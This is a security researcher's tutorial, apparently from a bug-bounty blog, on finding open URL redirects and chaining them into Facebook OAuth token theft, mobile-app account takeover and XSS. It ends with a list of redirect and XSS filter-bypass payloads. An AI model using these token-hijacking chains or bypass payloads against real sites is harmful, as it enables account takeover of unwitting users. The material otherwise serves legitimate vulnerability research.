Url Redirects


Open Url Redirects

Open url redirects are simply urls like https://www.example.com/?go=https://www.google.com/, which when visited will go from example.com -> google.com. Generally they are classed as low impact, but can we get account takeover with one?

So let's begin on actually finding an open url redirect and common places to look. Let's see what google knows first by using site:example.com inurl:redirect. We can play with that more by using more common words for redirecting such as, inurl:go, inurl:return, inurl:returnTo.

None found? Ok no problem, let's start using their site and look at common places. From my experience common pages are: login, register, logout, change site language, links in emails.

By this time we would of found atleast one open url redirect, and if not, get back to hunting! ;) Now we've got our bug, should we report it or try do something with it? From my experience I will always look further, and I highly suggest you do too! Here are some common things to do with an open url redirect:

Steal Facebook Oauth tokens via mis-configured facebook app
Facebook do a good job at trying to protect a users' access_token by having features such as the appsecret_proof, but sadly they are let down by people NOT using the features available to them. In walks the hacker. Facebook oauth system is simple: supply it with a client_id and a white listed redirect_uri to obtain the token.

An example: https://www.facebook.com/dialog/oauth?client_id=388795771235143&response_type=token&redirect_uri=https://www.cbssports.com/&scope=email

Note: Either use &response_type=code or response_type=token to achieve different results.

Now let's imagine we have an open url redirect on zseano.cbssports.com. If we input &redirect_uri=https://zseano.cbssports.com/ and it accepts it - BINGO. If not, don't worry, test something like https://www.cbssports.com/test/. If it still does not allow it, they're secure. If it does allow it, the scope can only be http://www.cbssports.com/*.

Now here comes a cool trick with facebooks oauth system. If you supply facebook with &redirect_uri=https://zseano.cbssports.com/?goto=https://www.google.com/ then it won't follow the redirect to your site (where you steal their oauth token).

The trick? URL ENCODE. That's right, if we give facebook &redirect_uri=https%3A%2F%2Fzseano.cbssports.com%2F%3Fgoto%3Dhttps%3A%2F%2Fwww.google.com%2F then it will follow the redirect to your site and you can harvest their fb oauth token. :)

What can a FB oauth token do? lots according to facebook. We can query for their email, post to their wall (if right permissions are given), and tons more. Is our open url redirect starting to mean something because we can harvest their users emails if they visit our site?

Account takeover with Facebook access_tokens

It doesn't stop at just querying for their facebook information. Get your mobile phone and see if this site has a mobile app. 9 times out of 10 they will have a "Login with Facebook" button and from my experience when logging in (and registering!) via their FB app they will do the following:

- Grab my facebook access_token
- Send it to their server and exchange for a bearer token
- Use this token in all calls (basically my session)

So are you following me here? The apps i've tested essentially allow me to redirect a user to the facebook oauth dialog screen, redirect to my site and hijack his token, then query the actual sites mobile api system in exchange for a token to.. you guessed it, the victims account.

Other common areas to look at are account settings for "connecting" a facebook account.



So, we just turned a "harmless" open url redirect into access to the victims account. Of course all cases of open url redirect are different, but this is a key place I always look (and usually succeed!).


What else can be done?

Open Url Redirects can also be used for XSS in a few ways. Let's investigate the case below.



As you can see we firstly have an open url redirect but also a chance to get XSS. What happens if I put ";alert(0);// ? (We use "; to end the var redirectToUrl=""; variable, and then // to comment out the last "; - if not javascript will moan. Using this over the usual script tag will also bypass chromes xss auditor :D)



Yay it worked! :D.

Using the old ?redirect=javascript:alert(0); can sometimes works, especially on SWF files. (site: example.com inurl:?clickTag= ext:swf is a very common one!)


Methods for bypassing filters

Every case is different with open url redirects but here are some payloads I use for getting a successful redirect / xss

  • java%0d%0ascript%0d%0a:alert(0)
  • (crlf injection to bypass javascript: being blacklisted)

  • //google.com
  • (incase http:// is blacklisted)

  • https:google.com
  • (browsers accept this, good if // is blacklisted!)

  • //google%E3%80%82com
  • (%E3%80%82 is 。 encoded. A HUGE thanks to filedescriptor for showing me that)

  • \/\/google.com/
  • (useful for bypassing // http:// blacklists. Browsers see \/\/ as //)

  • /\/google.com/
  • (same as above)

  • //google.com
  • (null byte to bypasses blacklist filter. can be used anywhere)

  • http://www.theirsite.com@yoursite.com/
  • (oldie, but browsers will redirect to anything after @)

  • http://www.yoursite.com/http://www.theirsite.com/
  • (if @ is blacklisted and they check if their domain is in the param, make a folder as their domain :D)

  • ";alert(0);//
  • (example from above. if the url is echo'd in a variable and we want to get xss in script tag)
..and there we have it. I hope everyone enjoyed the first post and you learnt something new about open url redirects and how to make them useful.